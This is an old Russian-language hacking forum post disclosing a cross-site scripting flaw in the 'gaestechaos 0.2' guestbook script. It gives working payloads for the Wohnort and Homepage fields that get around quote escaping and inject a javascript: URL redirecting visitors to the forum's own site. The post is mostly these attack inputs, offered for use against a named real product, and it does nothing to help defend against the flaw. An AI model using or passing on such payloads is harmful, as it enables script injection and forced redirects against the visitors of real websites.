Уязвимость гостевой книги   gaestechaos  0.2

Discussion in 'Уязвимости' started by Егорыч+++, 10 May 2004.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    В данной гостевой книге экранируются двойные кавычки а также ограничение по размеру полей. Однако обходится очень просто.
    В поле Wohnort:

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">><div id=aa>http://antichat.ru</div>[/QUOTE]<span id='postcolor'>

    А в поле Homepage:

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://we.de`><a style=background-image:url(javascript:navigate(aa[0].innerText));[/QUOTE]<span id='postcolor'>

    После чего как обычно получаем редирект на страничку АНТИЧАТ.

    Гостевая книга находится по адресу http://www.chaossoft.de